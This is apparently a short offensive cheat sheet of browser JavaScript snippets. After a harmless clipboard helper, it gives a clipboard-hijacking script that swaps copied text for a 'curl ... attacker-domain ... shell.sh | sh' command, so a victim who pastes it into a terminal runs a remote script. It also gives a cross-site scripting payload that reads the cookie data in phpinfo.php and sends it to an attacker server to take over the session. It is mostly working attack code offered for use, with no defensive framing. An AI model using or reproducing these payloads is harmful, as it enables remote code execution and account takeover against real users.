Copy to Clipboard
const copyToClipboard = (text) => navigator.clipboard?.writeText && navigator.clipboard.writeText(text);
// Testing
copyToClipboard("Hello World!");
Nasty copy/paste (run command on victim machine)
<script>
document.getElementById('copy').addEventListener('copy', function(e) { e.clipboardData.setData('text/plain', 'curl http://attacker-domain:8000/shell.sh | sh\n');
e.preventDefault(); });
</script>
Retrieve cookie
We can create a Cross-Site Scripting payload to retrieve the source code of the PHPINFO file and send it to our server. Then we can view the cookies and gain access to the user’s session! This can be accomplished with the below JavaScript:
<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
var url = ‘<target-url>/phpinfo.php';
req.withCredentials = true;
req.open('GET', url, false);
req.send();
function reqListener() {
var req2 = new XMLHttpRequest();
const sess = this.responseText.substring(this.responseText.indexOf('HTTP_COOKIE') + 1 );
req2.open('GET', '<attacker-server>/?data=' + btoa(sess), false);
req2.send()
};
</script>